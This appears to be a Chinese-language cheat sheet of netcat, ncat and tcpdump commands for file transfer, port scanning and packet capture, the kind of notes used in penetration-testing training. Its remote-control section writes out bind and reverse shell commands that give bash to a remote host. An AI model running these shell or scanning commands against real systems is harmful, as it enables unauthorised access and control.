NETCAT ——NC
网络工具中的瑞⼠军刀——⼩身材、大智慧
侦听模式 / 传输模式
telnet / 获取banner信息
传输文本信息
传输文件/目标目录
加密传输文件
远程控制/木马
加密所有流量
流媒体服务器
远程克隆硬盘
NC——TELNET / BANNER
nc –nv 1.1.1.1 25 <br /> nc –nv 1.1.1.1 80
NC——传输文本信息
A:nc -l -p 4444 <br /> B:nc –nv 1.1.1.1 4444
NC——传输文件/目录
传输文件
A:nc -lp 333 > 1.mp4
B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1
传输目录
A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf –
加密传文件
A:nc -lp 333 | mcrypt —flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt —flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q
NC——流媒体服务
A: cat 1.mp4 | nc -lp 333
B: 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
NC——端口扫描
nc -nvz 1.1.1.1 1-65535
nc –vnzu 1.1.1.1 1-1024
NC——远程控制
正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
反向:
A:nc -lp 333
B:nc 1.1.1.1 333 -c bash
NC——NCAT
Nc缺乏加密和身份验证的能⼒力
Ncat包含于nmap工具包中
A: ncat -c bash —allow 192.168.20.14 -vnl 333 —ssl
B:ncat -nv 1.1.1.1 333 —ssl
- TCPDUMP——抓包
tcpdump -i eth0 -s 0 -w file.pcap
读取抓包文件
tcpdump -r file.pcap
- TCPDUMP——筛选
tcpdump -n -r http.cap | awk ‘{print $3}’| sort –u
tcpdump -n src host 145.254.160.237 -r http.cap
tcpdump -n port 53 -r http.cap
若有收获,就点个赞吧
0 人点赞
